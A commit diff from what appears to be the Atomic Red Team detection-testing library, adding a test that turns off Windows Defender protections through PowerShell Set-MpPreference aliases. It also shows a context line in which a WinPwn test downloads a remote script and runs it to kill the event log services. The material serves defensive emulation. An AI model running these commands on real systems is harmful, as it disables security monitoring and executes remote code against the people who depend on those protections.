security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2022-07-15 16:16:09 +00:00
parent 0fb72b25fb
commit 768a631ee3
6 changed files with 65 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Indexes-CSV/index.csv
+1
View File
@@ -302,6 +302,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defen
defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
defense-evasion,T1562.001,Disable or Modify Tools,29,Kill antimalware protected processes using Backstab,24a12b91-05a7-4deb-8d7f-035fa98591bc,powershell
defense-evasion,T1562.001,Disable or Modify Tools,30,WinPwn - Kill the event log services for stealth,7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66,powershell
defense-evasion,T1562.001,Disable or Modify Tools,31,Tamper with Windows Defender ATP using Aliases - PowerShell,c531aa6e-9c97-4b29-afee-9b7be6fc8a64,powershell
defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
302 defense-evasion T1562.001 Disable or Modify Tools 28 Disable Defender Using NirSoft AdvancedRun 81ce22fd-9612-4154-918e-8a1f285d214d powershell
303 defense-evasion T1562.001 Disable or Modify Tools 29 Kill antimalware protected processes using Backstab 24a12b91-05a7-4deb-8d7f-035fa98591bc powershell
304 defense-evasion T1562.001 Disable or Modify Tools 30 WinPwn - Kill the event log services for stealth 7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66 powershell
305 defense-evasion T1562.001 Disable or Modify Tools 31 Tamper with Windows Defender ATP using Aliases - PowerShell c531aa6e-9c97-4b29-afee-9b7be6fc8a64 powershell
306 defense-evasion T1055.012 Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
307 defense-evasion T1055.012 Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
308 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
atomics/Indexes/Indexes-CSV/windows-index.csv
+1
View File
@@ -227,6 +227,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defen
defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
defense-evasion,T1562.001,Disable or Modify Tools,29,Kill antimalware protected processes using Backstab,24a12b91-05a7-4deb-8d7f-035fa98591bc,powershell
defense-evasion,T1562.001,Disable or Modify Tools,30,WinPwn - Kill the event log services for stealth,7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66,powershell
defense-evasion,T1562.001,Disable or Modify Tools,31,Tamper with Windows Defender ATP using Aliases - PowerShell,c531aa6e-9c97-4b29-afee-9b7be6fc8a64,powershell
defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
227 defense-evasion T1562.001 Disable or Modify Tools 28 Disable Defender Using NirSoft AdvancedRun 81ce22fd-9612-4154-918e-8a1f285d214d powershell
228 defense-evasion T1562.001 Disable or Modify Tools 29 Kill antimalware protected processes using Backstab 24a12b91-05a7-4deb-8d7f-035fa98591bc powershell
229 defense-evasion T1562.001 Disable or Modify Tools 30 WinPwn - Kill the event log services for stealth 7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66 powershell
230 defense-evasion T1562.001 Disable or Modify Tools 31 Tamper with Windows Defender ATP using Aliases - PowerShell c531aa6e-9c97-4b29-afee-9b7be6fc8a64 powershell
231 defense-evasion T1055.012 Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
232 defense-evasion T1055.012 Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
233 defense-evasion T1027 Obfuscated Files or Information 2 Execute base64-encoded PowerShell a50d5a97-2531-499e-a1de-5544c74432c6 powershell
atomics/Indexes/Indexes-Markdown/index.md
+1
View File
@@ -440,6 +440,7 @@
- Atomic Test #28: Disable Defender Using NirSoft AdvancedRun [windows]
- Atomic Test #29: Kill antimalware protected processes using Backstab [windows]
- Atomic Test #30: WinPwn - Kill the event log services for stealth [windows]
- Atomic Test #31: Tamper with Windows Defender ATP using Aliases - PowerShell [windows]
- T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Indexes-Markdown/windows-index.md
+1
View File
@@ -336,6 +336,7 @@
- Atomic Test #28: Disable Defender Using NirSoft AdvancedRun [windows]
- Atomic Test #29: Kill antimalware protected processes using Backstab [windows]
- Atomic Test #30: WinPwn - Kill the event log services for stealth [windows]
- Atomic Test #31: Tamper with Windows Defender ATP using Aliases - PowerShell [windows]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/index.yaml
+20
View File
@@ -17520,6 +17520,26 @@ defense-evasion:
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom
-consoleoutput -noninteractive "
name: powershell
- name: Tamper with Windows Defender ATP using Aliases - PowerShell
auto_generated_guid: c531aa6e-9c97-4b29-afee-9b7be6fc8a64
description: |
Attempting to disable scheduled scanning and other parts of Windows Defender ATP using set-MpPreference aliases. Upon execution Virus and Threat Protection will show as disabled
in Windows settings.
supported_platforms:
- windows
executor:
command: |
Set-MpPreference -drtm $True
Set-MpPreference -dbm $True
Set-MpPreference -dscrptsc $True
Set-MpPreference -dbaf $True
cleanup_command: |
Set-MpPreference -drtm 0
Set-MpPreference -dbm 0
Set-MpPreference -dscrptsc 0
Set-MpPreference -dbaf 0
name: powershell
elevation_required: true
T1601:
technique:
x_mitre_platforms:
atomics/T1562.001/T1562.001.md
+41
View File
@@ -66,6 +66,8 @@ Adversaries may also tamper with artifacts deployed and utilized by security too
- [Atomic Test #30 - WinPwn - Kill the event log services for stealth](#atomic-test-30---winpwn---kill-the-event-log-services-for-stealth)
- [Atomic Test #31 - Tamper with Windows Defender ATP using Aliases - PowerShell](#atomic-test-31---tamper-with-windows-defender-atp-using-aliases---powershell)
<br/>
@@ -1291,4 +1293,43 @@ inv-phantom -consoleoutput -noninteractive
<br/>
<br/>
## Atomic Test #31 - Tamper with Windows Defender ATP using Aliases - PowerShell
Attempting to disable scheduled scanning and other parts of Windows Defender ATP using set-MpPreference aliases. Upon execution Virus and Threat Protection will show as disabled
in Windows settings.
**Supported Platforms:** Windows
**auto_generated_guid:** c531aa6e-9c97-4b29-afee-9b7be6fc8a64
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Set-MpPreference -drtm $True
Set-MpPreference -dbm $True
Set-MpPreference -dscrptsc $True
Set-MpPreference -dbaf $True
```
#### Cleanup Commands:
```powershell
Set-MpPreference -drtm 0
Set-MpPreference -dbm 0
Set-MpPreference -dscrptsc 0
Set-MpPreference -dbaf 0
```
<br/>